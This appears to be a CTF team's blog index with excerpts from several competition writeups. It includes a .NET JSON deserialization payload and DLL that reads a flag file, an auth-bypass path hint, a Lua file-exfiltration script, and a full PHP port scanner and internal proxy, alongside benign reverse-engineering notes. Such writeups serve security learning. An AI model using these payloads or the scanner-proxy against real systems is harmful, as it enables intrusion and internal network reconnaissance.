NepCTF2022 Writeups - CNSS

NepCTF2022 Writeups - CNSS

Web

QR Code Maker

json反序列化漏洞,反序列化到Debug类加载上传的dll

1
{"$type":"qrcode_maker.Debug, qrcode_maker","ClassName":"./uploads/2111c416-2d20-4a7c-9393-12b0889a17f4","MethodName":"ClassLibrary5.Class1"}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ClassLibrary5
{
public class Class1
{
public Class1()
{
String text = File.ReadAllText("/flag");
throw new Exception(text);
}
}
}
阅读全文

WMCTF2022 Writeups - CNSS

WMCTF2022 Writeup - CNSS

Web

easyjeecg

/api/../ 权限认证绕过

随便找个GetShell就行

CgUploadController 路由传 upload目录访问马是 nginx 403

iconController 路由传 plug-in/accordion/images目录 404

upload 目录禁止访问 jsp 后缀

另外有个未授权 /webpage/system/druid/websession.json

可以查看所有人的session,这道题应该没用

阅读全文

拟态 2021 预选赛 Writeup - CNSS

第四届强网杯拟态挑战赛线上预选赛 Writeup By CNSS

Web

zerocalc

魔改过的 notevil 1.3.3

题目内提示了可以任意读文件

readFile('./src/index.js')

阅读全文

XCTF 2020 第三场 WriteUp - CNSS

RealWorld

luaplayground01

用IO读取文件flag_app,再用十六进制编码传递出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
file=io.open("/bin/flag_app","rb")
io.input(file)
content=io.read("*a")
function hex2str(hex)
local index=1
local ret=""
for index=1,hex:len() do
ret=ret..string.format("%02X",hex:sub(index):byte())
end
return ret
end
hex=hex2str(content)
for index=1,300 do
print(hex:sub(100*(index-1),100*index-1))
end
阅读全文

XCTF 2020 第二场 WriteUp - CNSS

Web

BABYPHP

在github上搜索code相关源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
<?php

set_time_limit(0);//设置程序执行时间
ob_implicit_flush(True);
ob_end_flush();
$url = isset($_REQUEST['url'])?$_REQUEST['url']:null;

/*端口扫描代码*/
function check_port($ip,$port,$timeout=0.1) {
$conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
if ($conn) {
fclose($conn);
return true;
}
}


function scanip($ip,$timeout,$portarr){
foreach($portarr as $port){
if(check_port($ip,$port,$timeout=0.1)==True){
echo 'Port: '.$port.' is open<br/>';
@ob_flush();
@flush();

}

}
}

echo '<html>
<form action="" method="post">
<input type="text" name="startip" value="Start IP" />
<input type="text" name="endip" value="End IP" />
<input type="text" name="port" value="80,8080,8888,1433,3306" />
Timeout<input type="text" name="timeout" value="10" /><br/>
<button type="submit" name="submit">Scan</button>
</form>
</html>
';

if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['port'])&&isset($_POST['timeout'])){

$startip=$_POST['startip'];
$endip=$_POST['endip'];
$timeout=$_POST['timeout'];
$port=$_POST['port'];
$portarr=explode(',',$port);
$siparr=explode('.',$startip);
$eiparr=explode('.',$endip);
$ciparr=$siparr;
if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
exit('IP error: Wrong IP address or Trying to scan class A address');
}
if($startip==$endip){
echo 'Scanning IP '.$startip.'<br/>';
@ob_flush();
@flush();
scanip($startip,$timeout,$portarr);
@ob_flush();
@flush();
exit();
}

if($eiparr[3]!=255){
$eiparr[3]+=1;
}
while($ciparr!=$eiparr){
$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
echo '<br/>Scanning IP '.$ip.'<br/>';
@ob_flush();
@flush();
scanip($ip,$timeout,$portarr);
$ciparr[3]+=1;

if($ciparr[3]>255){
$ciparr[2]+=1;
$ciparr[3]=0;
}
if($ciparr[2]>255){
$ciparr[1]+=1;
$ciparr[2]=0;
}
}
}

/*内网代理代码*/

function getHtmlContext($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header
curl_setopt($ch, CURLOPT_NOBODY, FALSE); //表示需要response body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_TIMEOUT, 120);
$result = curl_exec($ch);
global $header;
if($result){
$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = explode("\r\n",substr($result, 0, $headerSize));
$body = substr($result, $headerSize);
}
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '200') {
return $body;
}
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '302') {
$location = getHeader("Location");
if(strpos(getHeader("Location"),'http://') == false){
$location = getHost($url).$location;
}
return getHtmlContext($location);
}
return NULL;
}

function getHost($url){
preg_match("/^(http:\/\/)?([^\/]+)/i",$url, $matches);
return $matches[0];
}
function getCss($host,$html){
preg_match_all("/<link[\s\S]*?href=['\"](.*?[.]css.*?)[\"'][\s\S]*?>/i",$html, $matches);
foreach($matches[1] as $v){
$cssurl = $v;
if(strpos($v,'http://') == false){
$cssurl = $host."/".$v;
}
$csshtml = "<style>".file_get_contents($cssurl)."</style>";
$html .= $csshtml;
}
return $html;
}

if($url != null){

$host = getHost($url);
echo getCss($host,getHtmlContext($url));
}
?>
阅读全文

安洵杯 WriteUp - CNSS

Reverse

debugging

输入用blowfish-compat加密,keysize64,blocksize64,ECB,key=b’who_am_i’

随后进入VM,VM里就hexlify了一下,reverse了一下,然后加了一些偏置常数与目标比较

阅读全文

X-NUCA'2020 WriteUp - CNSS

Reverse

hellowasm

通过调试和瞎猜,输入会通过一个base64,但是会和key = [0xa,0xb,0xc,0xd]做异或,

之后进入一个虚拟机,调试发现其只使用了几条指令,其中运算指令就xor用的最多,于是对xor的时候下断点进行分析,可以猜到其异或逻辑,之后直接按照规则异或回来即可

阅读全文